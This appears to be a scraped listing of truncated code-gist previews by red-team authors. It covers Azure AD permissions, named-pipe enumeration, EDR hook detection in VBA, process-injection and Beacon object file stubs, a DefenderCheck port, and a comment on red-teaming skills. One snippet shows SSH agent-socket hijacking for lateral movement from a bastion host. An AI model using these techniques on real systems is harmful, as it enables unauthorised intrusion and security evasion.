dgroh

Application Permissions

List of AAD available application permissions

---

Permission	Id
AgreementAcceptance.Read.All	d8e4ec18-f6c0-4620-8122-c8b1f2bf400e
Agreement.ReadWrite.All	c9090d00-6101-42f0-a729-c41074260d47

byt3bl33d3r

// Add a reference to "WUAPI 2.0 Type Library" in Visual Studio
// References:
//     - https://github.com/xonv/nagios-net-client/blob/0920114874ecc85fc7ab3a4426e547c9dc63a44a/NscaWinUpdateModule/WindowsUpdate.cs
//     - https://docs.microsoft.com/en-us/windows/win32/wua_sdk/portal-client

using System;
using WUApiLib;

namespace WinUpdateTest
{

dmchell

using System.IO;
using System;

namespace GetNamedPipes
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("[*] Found the following pipes:");

jaredhaight

I think there’s a couple fronts that make a good red teamer. The technical side of being operator is less about knowing how to use tools (that’s easy to teach) and more about knowing how the technologies you’re attacking works. Having an understanding of how things work at a company gives you the context of how to attack and abuse it.

For example the stronger your sysadmin skills, the better you’re going to be at moving through an enterprise. Stuff like knowing how group policies work, having a solid understanding of AD. It’s all about having that context so you know how to abuse it. Having a development background gives you the context of how to abuse CI/CD systems and such. Knowing how kubernetes, how cloud works, gives you context on how to maneuver around it. Honestly, I don’t think I’ve used a single exploit in red teaming (which probably means I’ve left stuff on the table and made life harder for myself lol), it’s all been about finding and abusing misconfigurations in environments.

I think in a tru

int0x80

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld

G0ldenGunSec

#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include "beacon.h"


DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD);
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD);

X-C3LL

Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)

'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)


Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
    Dim address As LongPtr

rvrsh3ll

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;

namespace DinjectorWithQUserAPC
{


    public class Program

jfmaes

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;

namespace DinjectorWithQUserAPC
{


    public class Program

daddycocoaman

##################################################
## PyDefenderCheck - Python implementation of DefenderCheck
##################################################
## Author: daddycocoaman
## Based on: https://github.com/matterpreter/DefenderCheck
##################################################


import argparse
import enum